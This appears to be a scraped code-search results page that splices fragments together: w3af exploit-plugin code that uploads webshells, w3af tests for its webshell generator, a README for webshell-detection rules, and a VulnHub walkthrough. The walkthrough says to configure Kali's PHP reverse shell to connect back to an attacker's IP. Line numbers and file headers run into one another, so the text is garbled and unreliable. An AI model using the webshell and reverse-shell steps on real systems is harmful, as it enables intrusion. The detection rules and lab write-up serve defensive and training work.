55 56 Then the exploit plugin that exploits os_commanding 57 ( attack.os_commanding ) should return 'os_commanding' in this method. 68 69 if exploit_url is not None: 70 127 if shell_handler.SHELL_IDENTIFIER in response.get_body(): 128 return exploit_url 129 136 for shell_str, orig_extension in shell_handler.get_webshells(extension): 137 # If the webshell was webshell.php this will return a file_name 138 # containing kgiwjxh.php (8 rand and the extension) 177 178 self._exploit_url = exploit_url 179 223 """ 224 return self.__class__, (self._vuln, None, None, self._exploit_url)README.md https://bitbucket.org/lazy_dogtown/doxi-rules.git | Markdown | 99 lines
64hint for hacked / misused / C&C-servers and tries to detect 65web-backdoors, webshells and other malicious access to unwanted 66files/services. 83 84- detect exploit/misuse-attempts againts web-applications; please see 85scanner.rules for some details on webapp-based scanners 89- generic rules to protect a webserver from misconfiguration 90and known mistakes / exploit-vectors 91test_shell_handler.py https://github.com/andresriancho/w3af.git | Python | 119 lines
24 25from w3af.plugins.attack.payloads.shell_handler import (get_webshells, 26 get_shell_code) 69 def test_get_web_shell_extension(self): 70 shells = get_webshells('php') 71 80 def test_get_web_shell_code_extension_force(self): 81 shells = get_webshells('php', True) 82 90 def test_get_web_shell_code_no_extension(self): 91 shells = get_webshells('') 92 96 def test_get_web_shell_code_invalid_extension(self): 97 shells = get_webshells('123456') 982020-09-19-sedna-vulnhub.md https://github.com/wulfgarpro/wulfgarpro.github.io.git | Markdown | 193 lines
52 53Download the non-Metasploit PoC with EDB-ID [40390](https://www.exploit-db.com/exploits/40390): 54 87 88Copy _/usr/share/webshells/php/php-reverse-shell.php_ from Kali's bundled webshells and update the connect back IP address/port to be the attacking IP address/port: 89 89 90![php-webshell](/images/posts/penlog_sedna_by_vulnhub/php_webshell.png) 91